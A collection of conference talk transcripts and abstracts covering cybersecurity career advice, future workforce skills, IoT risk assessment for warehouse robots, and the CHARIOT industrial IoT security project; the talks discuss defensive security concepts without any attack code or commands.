engineer and we're going to help desk, right? It's okay to change. It's okay. There are so many opportunities out there. It is okay to pivot. I want you to find your next best opportunity. I really, really do. I want you to be where you're happy and very comfortable. And I think there's enough opportunities out there for that to happen. So really, really, be who you are. Do what you love. So real quick, I think this is my last spot. Negotiating. People really, really struggle in this area. I have screwed up in this area. I have undersolded myself. I have. And I've seen others do it as well. Here's what's up. Do not tell anyone how much money you make. Don't do it. Hey, they shouldn't be asking. And every federally mandated ordinance in the US anyway says that they can't ask you. So I guess I should practice that a lot of you aren't in the US. Sorry, I, this is applied to the US. I don't know the laws everywhere, but I will say this, regardless of where you are, the amount of money that you currently make has absolutely nothing to do with the amount of money you should be making or could be making. Okay. Because it doesn't speak to your bonafide occupational qualifications or your education or your certifications or the most important thing that every single one of you has to offer is your willingness and your ability to do the job. Regardless of what you have done, right? What are you willing to do and what are you able to do? Right? What can you learn? You know what? I don't even know how to spell Python, but I don't have a script. I just proved to you that I could be a Python developer willing. I'm able. So please don't tell them what you make. Think about, but also answer the question when they ask, what do you want to make and think about how you're going to deliver that question? What matters to you more than just your paycheck? Is it shares? Is it 401K? Is it flexibility? Is it the ability to go remote? Is it performance bonuses, incentive compensation? Think about the total package of things that matters to you in the long run. Is it the insurance premiums? Man, I'll tell you what. The difference, I'm not going to dox anyone, but between two paychecks and two different companies where the salaries were very similar, but the premiums were significantly different. Boy, that makes a huge difference. So okay, and that's pretty much it. So let's recap. Always be open. Be your own best advocate. I get it. Descriptions suck. Sometimes so do resumes. Let's find a way to meet in the middle. Be exactly who you are. Be yourself. You is good enough. Notice how you're being treated all throughout your candidate experience. That's very, very telling. Remember that these challenges are like the ones that you will face as an engineer, right? Look at them that way. And you can't make them go away. But you can hopefully beat them. Thank you, DEF CON. Thank you, Kathleen. And if there's a way for us to do questions and answers in this quarter or something, I am always open. Thank you. Thanks so much, Kirsten. I really appreciate all of your great points. You've been just an amazing asset to the entire community. Yes, everyone can ask you questions in Discord Channel. And I'm sure you'll be hanging around the con throughout the entire weekend and can answer other questions. Please do connect with her. She's always open to answering questions. And be sure to follow us on Twitter at hackingcareer. And that's it for today. Thanks so much, everybody.
|
As if finding your next gig wasn't already a challenge, now we have to do it in the midst of a pandemic. Let's talk about the new hurdles, how to get around them and the classic fundamentals like searching, networking, and negotiating
|
10.5446/51581 (DOI)
|
So here we are at the end of the first day of the career hacking village and I hope everyone has had a great time. We were so thankful that one of our partners came up with this idea about looking at what the future of the workforce would be about and how we can future-proof our careers. We're definitely in a time of a lot of change and a lot of uncertainty and it is always good to be thinking about what are the next steps and what can we be doing now to think about future-proofing our career. I'd like to introduce Janay Marikovic and she has some great thoughts for us to think about. Janay? Hi Kathleen. Thank you very much. I really appreciate you giving me the opportunity to talk about a topic that is near and dear to my heart. The title of today's lecture is future-proofing your career in the age of the intelligent ecosystem and some of the skills that we're going to need to build up this what we'll call an augmented workforce from the ground up. Just a little bit of background about myself. I'm a chief information security and chief technology officer for a company called Tyro Security. I've been doing cybersecurity for 20 years now and I've been a CISO for the last seven or eight. I've worked in a multitude of different industries including media, entertainment, life, sports, gaming. I've also worked in manufacturing, healthcare, and robotics. I've got some extensive experience building cybersecurity capabilities from the ground up so everything from security, architecture, engineering, forensics, and defense. I've also had the opportunity to invent a cyber defense framework based on American football. I've worked for companies such as Direct TV, Electronic Arts, Beckman-Culter, and investigation firms like Quarlow-Guerra. We are in what's called the Fourth Industrial Revolution. What that is, it's this time marked by an interconnection of the physical, the biological, and the digital world. When these worlds integrate the way that they are today, it gives rise to what we call big bank disruptions and ultimately transform entire systems. The accompanying pace of technological development is going to be exerting this profound change in the way that we live, the way that we work, it's going to impact all disciplines, all economies, and all industries. When these worlds mesh, you end up with what's called distributed thinking. That's where if everything is hyper-instrumented with sensors and the sensors have things like onboard artificial intelligence, and again, they're crossing multiple worlds, the digital, the biological, and the physical world, you end up giving rise to this thing called distributed thinking. What is an intelligent ecosystem? It's heavily instrumented sensor networks that are integrated across this mesh of all three worlds, so the digital, the biological, and the bio-networks. It's accessible via natural user interfaces, so think voice, gesture, and they leverage cognitive systems that ultimately make these real-time decisions at the sensor level, and this all occurs across blockchain-enabled networks. With all of this at the end of the day, all roads ultimately lead through cybersecurity. We have our work cut out for us. Attackers are better at adapting to, leveraging, and exploiting disruption. We operate in a world bound by rules. Their limits, quite frankly, are their own creativity, and our ability to predict and prepare is more critical than ever to deeply understand the forecast and the trends that will mold and shape the world of tomorrow. As cybersecurity professionals, quite frankly, we don't often fully understand how these near and long-term technology trends culminate. We don't think like world builders, we don't think in universes, and as a result, we end up with these disjointed, unnatural approaches to cybersecurity design from everything from the cybersecurity workers' user experience to these slow, debt-laden, and friction-laden enterprise security architectures. Designing for cybersecurity in the future requires a willingness for us to explore how these technical trends are going to manifest into this future world. What are some of the iterative steps that we can take that will help us both operate in this world comprised of intelligent ecosystems and how to protect and defend it? Since user-centric design starts with the user, it's time that we consider this cybersecurity professional and our user experience first. There's this wonderful quote from Accenture, and it's, in the future, people don't want more technology in our products and services. We actually want technology that is more human. Technology-driven interactions are creating and expanding technology identity for the consumer. This living foundation of knowledge will be key not only to us understanding the next-generation consumers and, quite frankly, security users, but delivering these rich, individualized experiences based on relationships in this post-digital age. One of the quotes that I like is from Steve Jobs, and he was at a conference called D5, and he said, I just want Star Trek. Give me Star Trek. Why is that? Well, it's because technology experiences in Star Trek are natural and oftentimes invisible and transparent. Tech is built into the fabric of the ecosystem, and the ultimate trajectory is building these humanized technologies, ecosystems that sense, that feel, that think, intelligent ecosystems, but to engage in predicting the future, we need to take a look at how all of this is ultimately going to impact us. And so these next-generation security systems are going to leverage human-centered designs that intersect with empathy and creativity with consideration for us as the end user, and they're going to be accessed via these deeply personalized and anticipatory interfaces using, like I mentioned before, natural language and voice. And they are going to culminate into these role-based and purpose-based digital assistants that are ultimately going to help us navigate employees through decision-making processes and the explosion of data in these intelligent ecosystems. And so as the AI and the cognitive solutions involved in sophistication, you know, of technology, we too as cybersecurity professionals, we've got to figure out, ultimately, that's going to affect our jobs. How is it going to affect our work? What is our work going to look like in the future when the majority of our workload is automated? What are the skills that are necessary to operate in these blended worlds where security professionals are working alongside assistants or robotics? So we're going to have to learn how to operate faster. We're going to have to be capable of applying new skill sets rapidly. There's going to be a change in the way that we deal with our skills, and we're going to have to learn, you know, a set of skills that place higher value on our people skills, our business intelligence, our independent thinking, innovation, and especially around creativity. So building the next generation security worker. So in this next section, we're going to talk about some of the six sets of skills that I kind of wanted to delve into. I'm sure through many other lectures, we've talked about, you know, traditional cybersecurity skills that you need in order to move on to your next role, or even some of the human skills such as presentation and empathy and so forth. I wanted to take a little bit of a different tact and focus in on skills that I believe security people are going to need if you're operating in a world where much of our work has already been automated away. So I broke the skills into two different areas. One are STEM skills, and the other one is what we'll call human skills. So the first one is artificial intelligence. So this is very meaningful to me. In fact, I felt so strongly about this when I was working at a design firm as their CTO. We designed a set of artificial intelligence training for everybody in the company. As cybersecurity professionals, we're dealing with a couple of things here. One, you're expected to protect and defend systems that have machine learning built into them. So from the security, architecture, and design phase to the way that we instrument and monitor attacks against systems that have machine learning built into them to the way that you do digital forensics within these systems, you have to have a foundational knowledge and understanding of AI in order to be able to do your future job. But the other is that with the augmented workforce, you're working alongside digital assistance. We already see this in industries such as supply chain and customer care where people have digital assistance or in some cases robotics that are working alongside and taking over a lot of the day-to-day activities that they quite frankly are able to do through automation. So in building and designing these systems, it's really key and critical for security users to understand AI, not just from a basic level, but I would say ultimately through the mid-level. The next are biological systems. So we already mentioned earlier that there's this intersection between the physical, the digital, and the biological worlds. Everything that comprises the fourth industrial revolution. And so we're going to be working in worlds where you're expected to design the cybersecurity controls in embedded biological devices. So example, think of embedded medical tattoos. Think of ingestible robots as an example of medications that have nanobots and so forth that are built into it. And we're going to be expected to design these security into those and to other biointerfaces and to wearables. And so understanding that if those systems get compromised, what is going to, what can be the impact to the human is going to be key. But it's actually a little bit more than that. The world's been around for what, four and a half billion years, and biological systems have had the chance to evolve. And I already mentioned earlier that we oftentimes as security people don't think in ecosystems. We don't think in world building. And so if we want insight, if you want create, you know, you know, insight into the way that you can approach building security, holistically, you can look at biological systems. A couple of examples, the human immune system. There are several books out there that talk about human immune system architecture. And when we look at the way that we design security systems, we oftentimes don't do it very holistically. So if you look at the construction of a human immune system and you correlate that, there's a lot of insight that you can get from there. A couple of quick examples are it's frictionless and transparent. When your immune system goes off, it's because there's something bad that's happening. You don't wake up in the morning thinking about your immune system. Yet, those are the actions that we expect of end users when we design security systems for them. So, you know, the future design of cybersecurity systems needs to be, you know, more transparent and a lot less friction, you know, to the end user. There's insight into biological systems in terms of the way that animals communicate with each other. And you can take insight from there. You know, just when you look at everything from ecosystem, terrestrial ecosystem design, you can take inspiration from that in terms of the way that you approach the design of cybersecurity. So, both because we're going to be operating and designing cybersecurity into biological systems and because there is insight that can be gained from biological systems, I highly recommend becoming more competent in biological systems is a skill that we're going to see cybersecurity people need to do. User experience design. So, I talked a little bit earlier about what does the design currently, what does the user experience look like for a cybersecurity professional? We've all experienced it. It doesn't matter what your role is. You're in it at 100 applications plus the context switching that we have to do is astronomical. It adds a lot of friction to the process. It adds a lot of time to the process. And when you're dealing with attacks that, you know, operate rapidly, and again, attacks that can cross multiple worlds, then time is absolutely of the essence. And yet, and still, when we look at the way that security architectures are designed for us as end users, they're problematic. Oftentimes, you have to click through multiple screens in order to be able to get anything done. They are not designed with the care that you designed to, you know, interfaces for safer instance consumers. And so, since the future of our applications are going to have these voice interfaces, these digital assistance built into it, we as security professionals understanding how to design user experiences is important to us. But it's also important to end users. When we think about what we ask of end users, you know, we don't oftentimes understand, you know, the full experience that they have as part of their journey and the things that we're asking them to do as part of their day-to-day activities or within the applications themselves, and oftentimes follow the best user experience for that individual. And so, understanding how to do UX or user experience design, understanding how to map out user journeys and build security into them, I think it's going to be an absolute key experience. Creativity and design. So creativity is still one of those skills that humans outperform machines. And so our ability to think outside of the box, our ability to apply creative processes to things are going to be critical, especially in the world of cybersecurity. We're going to see attacks and we're going to see breaches, unlike anything we've seen in the past, which means that we're going to have to leverage different types of experiences and different ways of doing things far different than anything that we've done in the past. And so a proper education in training in the world of design and a proper education and training in the world of creativity and things like design thinking, I think are skills that we're going to have to see not only in STEM careers, but definitely in the world of cybersecurity. We've already mentioned that attackers are really bound only by the limits of their creativity, which means that we need to meet creativity with creativity. Storytelling. One of the key things that we're going to have to build as a workforce is our ability to communicate. Security people are oftentimes very good at communicating with other technical people. But when we get outside of the technical realm and we start interfacing with our colleagues, when we interface with users, when we interface with our management, when we interface with the board of directors, we think we are communicating one way. Unfortunately, our audience is interpreting it a very different way. And so understanding how to storytell is going to be one of the key skills in terms of communication and persuasion, quite frankly. Negotiation skills are predicated also on your ability to storytell. Humans have been storytelling as a way to communicate information since the beginning of time. And being able to reach into some of those ancient skills that we have and understand how to communicate these very difficult topics using mechanisms such as storytelling and understanding things like the hormones behind storytelling, the way that you tell specific stories in order to elicit certain reactions that actually have hormonal responses and get the person to either feel like there's a call to action or have empathy with you as the storyteller. All of that is predicated on our ability to be able to tell a good story. So storytelling is absolutely one of the key skills that we're going to have to build. And empathy. So empathy is, I think oftentimes an underrated skill. And it's because we oftentimes believe that you have it or you don't. And being able to build a bond with our users, in fact, key to storytelling is our ability to be empathic. And so if we're expecting our users, if we're expecting our colleagues, if we're expecting management to understand what we're trying to communicate, then we also have to be able to look at the world through their eyes. We need to look at the world through the lens of where they're coming from. If we're trying to do proper user experience design that is predicated on empathy, if you're trying to do creative design, it is predicated on empathy. So everything that we do in the world of cybersecurity when we're trying to communicate out and get people to align with us or take specific actions is our understanding of how to look at the world through their lens unbiased and work through designing solutions that ultimately allow all of us to be able to work together. So I wanted to end on this, and that's a call to action. One of the, you know, as security professionals, you know, one of the things that we really need to focus on is demanding oftentimes that the industry as a whole start looking at security experience design end to end and holistically. So everything from the way that we interface with applications so that when you're instead of having to interface with 100 different applications, you're working with digital assistants that are capable of automating a lot of the work and then representing the information to us in a way that ultimately makes sense and makes our jobs easier is absolutely key. Making the people who designed for us to start thinking about, you know, our lives holistically end to end and not just trying to solve this one problem with this one piece of technology but understanding the stressors that security people deal with and, you know, what their lives look like in the context of trying to do this work is absolutely key. And so I wanted to have a call to action that we demand more from our vendors that when they're designing for us that they design as if they're designing for a consumer. So when we look at things like digital assistants and the way that digital assistants have been built for consumers, why that type of experience can't be built for cybersecurity needs to needs to stop. We need to start demanding that proper UX design that, you know, things like natural user interfaces that futuristic technology gets embedded into our user experience so that at the end of the day, you know, we're able to deliver the protection and defense services to our, you know, to our companies and to the people that we're responsible for protecting. And I wanted to thank you for giving me the opportunity to talk about, you know, intelligent ecosystems, some of the human and STEM based skills that I'd like to predict that we're going to need in order to operate in this future world. And thank you very much and enjoy the rest of the conference. And I thank you so much. That was really inspiring and sort of really turning our heads around as far as, you know, we tend to push a lot as far as you need this certification, you need to know this language, you need to know, you know, sort of hard science kind of skills. And some of the things that we've been talking about over the last year or so has been the skills that people learn when they're volunteering in conferences, learning how to better communicate, learning how to be empathetic and the way you are practicing your empathy is by being a volunteer and dealing with people from different cultures and different backgrounds and understanding that you do have the capacity to be empathetic, you just need to learn how to use it and constantly practice it. So these are really great, great pieces of information. I know a lot of people will be talking to our career coaches over, you know, today and tomorrow. And I think that this is something that we can really touch on as far as what are the other skills that everyone should be looking at as they develop their career. So thank you so much for this and everyone have a great evening and we will see you all tomorrow at the Career Hacking Village. Thank you. Thank you.沒
|
We have entered the 4th industrial revolution, a time marked by the interconnection of hyper-instrumented physical, biological, and digital worlds. The accompanying pace of technological development will exert profound changes in the way people live and work, impacting all disciplines, economies, and industries. Preparing the cybersecurity workforce for the changes that will reframe their careers requires insight and a vision of our possible future. Next-generation security professionals will both leverage and work alongside purpose-based digital assistants to help navigate the explosion of data created by intelligent ecosystems. These virtual assistants will replace current knowledge management platforms/intranets, dashboards, and manage any security process that can be automated. As machine learning and cognitive solutions evolve in sophistication, security teams must re-examine how they organize work, design jobs, and plan for future growth. Let's futurecast near term technological trends and identify the concrete steps all security professionals need in the Age of the Intelligent Ecosystem and the Augmented Workforce.
|
10.5446/51303 (DOI)
|
Okay, so our first paper is a risk assessment in Ayotica study collaborative robot system presented by Salim Kaeda, researcher at the University of Grenobleps in France. Hi, hi, hi everybody. So my name is Salim Shahidaf from the laboratory very mug of University of Grenobleps. In this work, I work in the specification design and verification of cyber physical systems, IOT systems. I also work on the security of the systems. So in this work, we propose an approach for risk assessment in IOT systems. And after that, we apply this approach to a collaborative robot systems. First, I would like to to thanks all the authors participated in this work from Robotnik Automation Company and from Airbus Defense and Space. So I think you can share the video. Hello, everyone. This work is funded by Brain IOT project that aims to develop framework for reducing the effort of developing, validating, operating and monitoring IOT based systems. In this work, we propose an approach for risk assessment in IOT systems. Then we apply our approach to analyze risk in collaborative robot system. First, I would like to thank all the partners and authors participated in this work from Robotnik, Airbus and IMAXA companies. This is the plan of our presentation. We first start by the state of the art of existing standards and methods for security risk assessment. Then we introduce our approach and we present our case study of robot system for supporting the movement of loads in our house. In the third part of our presentation, we detail the main steps of our approach and their application to our case study. Finally, we give some conclusions and future work. An IOT system includes a lot of devices such as sunsores, actuators and other physical entities. These devices can be connected using several communication technologies such as RFID, Bluetooth Wi-Fi and Lora. The large number of devices and communication protocols that can be used in IOT systems can increase the vulnerabilities and attack that can exploit these vulnerabilities. In this work, we propose a risk assessment methodology to identify and mitigate the risks. We aim to build the secure IOT systems that ensure security requirements. There are a lot of common standards from international organizations such as ISO, NIST and E3A. These standards provide generic guidelines for the security of systems. There are also some standards proposed by ITUT, ISO and E3A that deals with some specific issues related to IOT security. In this study, we consider these standards, especially the ISO 27002 that gives general guidance to ensure the main security objectives. There are also a lot of existing methods for security risk assessment. For example, ABS method from the National Cybersecurity Agency of France that allows risk assessment in information systems. The CRAM method from the Center Computer and Telecommunications Agency in United Kingdom that allows the qualitative risk assessment. The AURA method that supports the NIST SP 830 standard. The Mihare method from French Information Security Club that supports the ISO 27005. However, these methods are generic and not considered the complexity of IOT systems. In this work, we propose a new method adapted to IOT-based systems. In our approach, we start by identifying the assets of the system based on reference IOT domain model. In the second step, we specify threats on the assets based on common threats database from IBIOS method. In the third step, we rely on the ISO 27002 to derive the security objectives from the threats. Finally, we give security requirements that implement the defined security objectives. Our approach is iterative, so the security requirements can be revised after the refinement of system assets. Also, the results of each step should be checked with the customer and security expert. We apply our approach to a collaborative robot system from Robotnik Automation Company in Spain. In this system, a fleet of robots is deployed to support the movement of loads in warehouse. Robots move items from unload area to storage area passing by an automatic door that separates the two zones. This system is managed automatically without the intervention of human operator. To properly identify all the assets of the system, we refer to IOT domain model proposed by Heller. The IOT domain model defines the main concept and the relationships in order to avoid any ambiguity. Here we present some important concepts. On the left thing is the combination of physical entity together with its digital representation called virtual entity. There are two types of virtual entity, passive digital activa that corresponds to a digital representation of physical entity stored in database or similar form. The second type is active digital activa that corresponds to any type of active scout software program or embedded application. On the right, device is a hardware with computing and network capabilities. Device can be a sensor that allows to monitor physical entity, actuator that allows to act on physical entity, or tag that allows to identify physical entity and it can be read by sensors. The domain model also describes other concepts such as users and resources. Here examples of assets from our robot system. The system includes different types of devices such as sensor, here example of three robot sensors. We have also example of actuators such as door PLC and other type of components. For the identification of threats associated with the defined assets, we refer to the IBIOS threats database. In the IBIOS database threats are classified into eight categories and they can be caused by two factors. Environment factors such as natural event or human factors such as unauthorized actions or comprised of functions. In this table, we show examples of threats associated with assets defined in the previous step. This table is completed with our partner from Robot Necrotomation Company and then validated and approved with security experts. In the last step of our approach, we relay on the ISO 27002 generic list to specify security objectives needed to protect the system assets against the identified threats. Here in this table, we give some examples of security objectives and we map if each security objective with the covered threats. The security objectives should cover all the identified threats. After the specification of security objectives, we define security requirements. In this table, each security objective leads to the implementation of one or more technical requirement. The requirement should be approved by security experts, then appropriate counter-regions can be deployed to ensure security requirements. In this work, we have presented security risk assessment method for IoT systems and applied this method for robotic service system. Among the advantages of our approach, it considers the IoT domain model to identify system assets, it considers standards to specify security requirements, it is iterative and considered evolution and change in the system. We have applied our approach to collaborative robot system and also for water management system. In the future work, we plan to apply our method to other systems. We also plan to support our approach by tools. Thank you. Thank you so much. Are some questions for Salim from the audience? I would like to ask you something, Salim. You mentioned that you mentioned that you have a question, Rosaria, a couple of questions. Yes, I have a couple of questions. I will let Konstantinos, could you please unmute yourself and ask the question? No, hello. It was not actually a question. It was us raising the hand for the next presentation. No question. Sorry for this. It's a Kariya. You can unmute yourself. Hello. Hi, Salim. Thank you so much for the presentation. It's interesting. Actually, I have one question. At the beginning, you presented some states of the art and some standardization work. My question, you have selected one of those standards. Did you use some criterias or some kind of like why you use ISO exactly and not other standards for risk management or risk assignment? Sorry. It was like a choice or like a recent specific requirements? Yes. Thank you for the question. In this work, we have done the state of the art of all the existing standards about the security, generic security of systems and also for the security of IoT systems. Here, with the help of some security experts in IoT systems, we have extracted the relevant and adapted the standards for the security of IoT systems. For each standard, we have extracted some relevant part which is adapted to IoT systems. Okay. Thank you. Just another question and not like a really question about the presentation. This study you did with the other experts, it's included in the paper? Yes. Okay. Thank you. We have experts from insecurity from Airbus, Defense and Space. Okay. Thank you. We have other experts which help us for this work. Yeah. No. Sorry. My question was more about the studies included on the paper. Yes. Okay. Thank you so much. Thanks. Okay.
|
Security is one of the crucial challenges in the design and development of IoT applications. This paper presents an approach that focuses on existing security standards to evaluate and analyse the potential risks faced by IoT systems. It begins by identifying system assets and their associated vulnerabilities and threats. A list of security objectives and technical requirements are then defined to mitigate the risks and build a secure and safe system. We use our approach to assess risks in the robotic system for supporting the movement of loads in a warehouse."
|
10.5446/51304 (DOI)
|
Okay, Constantino will present us the integrated solution for industrial IoT data security in the chariot solution. Constantino Lupus is from LENCOM Innovation. Okay, great. Thank you so much. Okay, thank you to thanks to a big thanks to Eclipse Foundation for the organization of this event. I think there will be a lot of interesting discussions and presentations from the participants. I will give you the presentation about the chariot project with it's about an integrated solution for industrial data security. Let me introduce my first and where I come from first. So I'm confident as Lupus, I'm the head of R&D program in ILECOM related to IoT systems and the ICP in general development. ILECOM is an SME with offices in Athens, Brassets, London, and Ireland, and we have, we are particularly active in the research projects. We have a series of around 22-25 projects running right now. So it's a long experience that is very much aligned to modern IoT solutions, ICT developments in general. So, I will start with a quick overview of the situation in IoT. What are the industrial challenges right now? I'm sure that we are well aware of the situation, but let me make a summary. And I will, with this I will drive the discussion into what chariot develops and how this aligns to its scope. So we'll know, we can see a graph here by Gartner predicting that there will be around 75 billion IoT connected devices worldwide by 2025. So it's a big number to consider. And this number is expected to increase even further after this time. And security of these IoT devices and with IoT devices, we can include the whole spectrum of IoT. It needs to be considered seriously. And so, this is what has actually been driving chariot as a scope and as a project. We have seen very recently a lot of security breaches in various instances, but also increasing and expected to further increase in the next years. There is a lot of research in the background, there is a lot of commercial activities as well to protect and strengthen the devices against these attacks. But still, as IoT devices increase, we should expect that, you know, security breaches will also be aligned with this with this trend. And, but there is, there is obviously some, some tasks that we need to do to protect the device and finally the user personal data, that's the data. And all these points are of attention recently. So this is this is the origin and the idea and the scope of the project and the reason for its rise. It's our project is a series of projects as I said funded by the IOT 03 call of 2017 on our right integration and platforms. It's a research innovation project with a finding of around 5 million euros, and has a duration of 36 months. And as it started on the first of 2018 is expected to last at the end of this year. And so we consider IOT of course as I said, but we are focusing on industrial systems, I will explain later what, what, what is the business here. And we also consider cyber physical systems or systems or systems and important and critical infrastructures and systems in this infrastructure whose failure or malfunction can result into you know harm injury or injury or even death to people, the damage of properties impact to the environment. In other words, you know, and actions that can modify the original purpose of the IOT device. So these can comprise of hardware software infrastructure with human aspects, all the, all the points around the IOT and the actual industrial infrastructure. So the security of this of the data coming and going and the objects involved in the networks infrastructures and systems inside this environment, have a dominant role in this in this project and will continue to happen in the next year. So in in in recognizing all these security threats, and they are the broad aspect and the potential to even rise further and has led, has led the technical developments of Tzario into providing a more secure platform for data integration in industrial environment. And so, roughly speaking, on the objectives of the project, we are developing a logical framework for the design operation of security safe IOT applications. And we're designing and cognitive IOT architecture and platform, which is the target platform what we call so this is an intelligent layer and safety behavior. And we're also developing a runtime IOT privacy security and safety supervision engine that monitors the activities of the data inside the networks. And we also apply, deploy and validate the developer technologies into three living labs, what we call a pilot, what we call my three living labs, it's actually pilot cases into trains in Italy, in Italy, a smart building in IBM, an island campus, and the Athens International So these are the three use cases that we are focusing on, and we apply the technologies and we are currently at the validation stage, you will see results in my next slides. So, Tzario, first of all, let's have a look at the technical outcomes, the robust technical outcomes that Tzario provides, we can start from the IOT devices lifecycle management, which is supported by blockchain technologies based on the PKI for sensor and gateway authentication. We are embedding keys, private public keys in sensor and gateway controllers, whatever we have in the industrial environment. We have a blockchain, both at the gateway and the server and also the sensor level in each of the installation. And we are also to support this, we are also developing some prototype sensors, having the required capabilities to support blockchain. And what we have found recently, through our research and deployments in this project is that there are many many IOT devices used in these infrastructures, for instance, for example, you can imagine a smoke detector in an airport, or a smart door or something like that, but we do not have the required capacity in terms of your processing capacity to execute code and enable us, allow us to implement encryption between the device, etc. There are some challenges that's why we had to adapt to this, and that's why we have developed a series of prototype sensors, supporting some processing capabilities, to be able to support this point. And so, there is a we have incorporated also blockchain encryption between the devices and network all network and points being sensors, gateways, local network, etc. This is supported by mobile application for sensor provisioning and the IOT network, and a blockchain based state management for the sensors, meaning decommissioning, detection of faulty sensors, compromised, etc. A second important layer of chariot is the IOT firmware development and deployment. We all know that we need to, at some point we need to trust the firmware that is running on the actual IOT devices. In this direction, we do a complete series of developments, including the starting from the software development, the writing of the code actually up to the deployment of this firmware as an executable as a binary file to the device. So, there is a there is a layer where we check the software produced for IOT devices at source code level, and we, we detect vulnerabilities like stack overflow like buffer underrun this kind of things that can lead to vulnerabilities, all kind of enable hackers to do malicious actions, etc. And we verify this through a hashing mechanisms via blockchain. So we secure the transmission of the, of the actual firmware of the actual developed firmware to the IOT device to be updated. And during the update of this firmware, we also perform an analysis of its binary code in an execution level, which means that we are taking, we are checking for vulnerabilities of the actual binary of the executable file, and for various vulnerabilities that may be present in the in the in the firmware, in the binary. And like code code code injections, it could be invalid pointers inside the binary or malicious pointers pointing to, you know, injected code, etc. That's that's the reason behind it. And a different layer in in in charge is the, the, the intelligence layer that we provide, and this includes that analytics, and includes three different engines. The first one is the privacy engine, which ensures that there are no private information circulated inside the IOT network. And we're using several analytics analytics techniques to identify this, this privacy issues. And so we detect, in other words, sensitive data and professional data inside the sensor communications. And the safety supervision engine, which is responsible for predicting predicting anomaly detections based on machine learning methodologies. This is based on neural networks, and it's, it's, it's, it's also supporting user defined models. And so, and we're also providing a safety supervision engine component with with IOT language that is, that is allowing us to manage the network configuration in a dynamic approach. And through this we can describe access control mechanisms rules limitations we can import different layers of rules and define the network topology in the network. And finally we're using predictive analytics and as predictive analytics algorithms and to highlight any out of bounds behaviors or any, any, any. And the flow of information of data that is not following a normal or expected behavior. Of course this could lead to, could be, could be due to malicious actions in the action in the network or a full sensor. And finally we have a platform and the various user interfaces that are supporting this above three major components. And the first one was basically was the core of the target project is a platform what we call the target platform. And this is the orchestrating mechanism for data ingestion essentially the digestion management storage, smooth and normalization of data and external connectivity is to interface with the existing infrastructures and the data management systems that they already have. It is the target platform that is responsible for managing the machine learning model so it's where the actual in engines are running and the analytics etc. And we also support this by device management that's for an operational dashboard these are two distinct dashboards. The first one is for handling sensor registration for updates is more on the user interface and more it's quite simplistic and provide us you know the capability to to set up the network to configure the sensors to include or remove new sensors, etc. The version of dashboard on the other side is is more on the technical side again for the again designed for the requirements of end users but providing more information on the on the platform health performance monitoring handling of alerts sensor data visualization. And this is this side of the story. So, it's providing data, it's, it's creating what if scenarios it is, it's very helpful to simulate different security incidents, and it's also, it was also very useful for us to test the system and to validate it actually with with with data. And also to to to to create an incident in in in an infrastructure. So, the, the, the challenges that have driven us to here can be seen the next slides. The major challenges is dropping interception hijacking of devices. And by this we mean man in the middle attacks hijacking protocol, hijacking protocols, network interventions, these kinds of things that are very, very common and they are very much prioritized. This is based this, this list that you will see in these slides based on an recent report. So, we provide regularize communication protocols between the communications between the devices with encrypted communications. And there is a strong presence of blockchain in this for the registration affirmation of the of the of the data of the sensors in the network. And there is blockchain used heavily for sensory gateway authentication. And of course, sensor provision is done using for a principle following modern commercial approaches. And of course, modernized and user friendly dashboard configurations for, you know, for sensor configurations management alerting things like this. The second challenge that is present in iot devices is the nefarious activities. In this we include malware denial of service instances software hardware information manipulation targeted attacks abuse of personal data brute force attacks this kind of attacks. And this we are we have developed the firmware static and binary checking and analysis. So these are the two levels that I described before for the firmware running the device. We affirm the housing. So we we we produce we we have developed the mechanism and for trusting the whole lifecycle development meaning starting from the source code, you write the code, you compile the code. This is safely stored in the blockchain through a housing mechanism. So you are sure that the the the firmware developed compiled by the software engineer is actually the one that is transmitted to the device. And this is this is very, very important so that we can enhance the trust that the infrastructures have on on the firmware running on their devices, whatever they are. And this includes of course a sensor registration mechanisms, a flag of personal data as I said before, and this again are supported by some dashboard mechanisms to support the end user as a with a user interface. And of course we should forget accidental or intentional damages. And these are these are could be due to mistakes of the personnel to do an intentional configuration changes to mistakes that personal has done. So for this again we are providing the mechanism for the data and gestion management the storage normalization and and would provide also the machine learning anomaly detection, which will detect any not expected behavior of the sensor or for the data coming and going inside the network. The language that we have developed is also helping us in this direction, providing you know the configuration of the network control rules, etc. Again this is integrated fully into the dashboard solution so there is a simple interface for the user to connect and and play with the with the network. And finally there are some other categories that charge is also aligned to what are here we're talking about failures or actual malfunctions of devices, legal implications, even physical attacks. Okay, physical starting bottom up physical attacks are not the major scope of charge as you can understand this is more infrastructure related and not to you know in the scope of charge however a malfunctioning of devices will be detected by the by the product solution. And on the on the failure side and the legal side there are these machine learning and normal detection techniques, predictive analytics, but also a this safety platform, and that is detecting any personal information so we avoid the legal implications in the IOT network and infrastructure. So, closing the, the three cases that I described before is the smart campus and IBM, a real case in trend Italia and the Athens international airport. You can say summary of what is their needs actually right now. And so, in the in the smart campus we had to cope with challenges on the utilization of sensor data during a fire, your or a hazard event. And taking for security problems in the binary framework. So when you update what happens to the framework when you update it on the device and encrypt the readings of present sensors, used in the buildings, and, and the sensitive to data privacy inside the smart In Italy, the situation was similar but not not not exactly on this as we have to do with, you know, a rare environment, a more hard environment where early detection was of primary importance, and of either a normal dot or unauthorized devices entering the network. And in the ultimate scope of earlier letting for any potential security violation and notify the security manager of the of the rail operator in the in the Athens international airport as you can imagine. There are similar cases of, of facility, IOT devices that are responsible for physical and cyber threats and detection of anomalous operations there. The major importance in the airport is of course, and the users safety, the people that are flying to ensure that the, and both their personal safety and the infrastructure safety is, is compliant to the standards required. And the comfort and safety of the passengers and the people there could was the primal scope here. And of course, guaranteeing and trusting the central data is it was the key point at this stage. So, we are close. A quick update on the status of the project we have completed the technical developments and the integration and deployment we are right now in the validation stage of the platform and the different components. And we, we are, we are following an iterative system design, which means that we have already collected some information from the end users as feedback, and we have improved the technical developments that we finally apply to the three structures. So, yeah, by the end of the project, the year the project is finishing so we are in the in the validation right now stage. That's it from aside, I have exceeded the time slightly sorry about this.
|
The CHARIOT H2020 (IoT) project (Cognitive Heterogeneous Architecture for Industrial IoT), integrates a state-of-the-art inclusive solution for the security, safety and privacy assurance of data in industrial networks. The solution is based on an integrated approach for IoT devices lifecycle management (based on blockchain and public key infrastructure technologies), IoT firmware development and deployment (source and binary level vulnerability analyses), data analytics (privacy by design, sensitive data detection, dynamic network configurations etc.) and a set of user interfaces for management and control of the network, devices and the CHARIOT platform. CHARIOT is funded by the H2020 programme under the IoT topic, has a 3-year duration and concludes its activities by the end of 2020.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.